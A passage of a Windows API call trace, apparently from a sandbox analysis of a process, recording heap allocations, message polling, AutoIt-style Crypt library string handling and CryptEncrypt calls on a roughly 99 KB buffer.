lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0187.784] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0187.785] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0187.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0187.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0187.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.790] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2678, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2678*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0187.790] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.790] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.790] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0187.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.790] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0187.791] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.791] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.791] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0187.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.792] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.792] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x182d4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x182e0) returned 1 [0187.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.792] CharLowerBuffW (in: lpsz="byte[99041]", cchLength=0xb | out: lpsz="byte[99041]") returned 0xb [0187.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.795] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.797] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8f5c8*, pdwDataLen=0x87e820*=0x182d4, dwBufLen=0x182e0 | out: pbData=0xa8f5c8*, pdwDataLen=0x87e820*=0x182e0) returned 1 [0187.798] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.798] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.798] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.800] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.800] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.800] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.800] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0187.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.800] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.801] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.801] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.801] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.804] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.804] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.804] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0187.805] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, 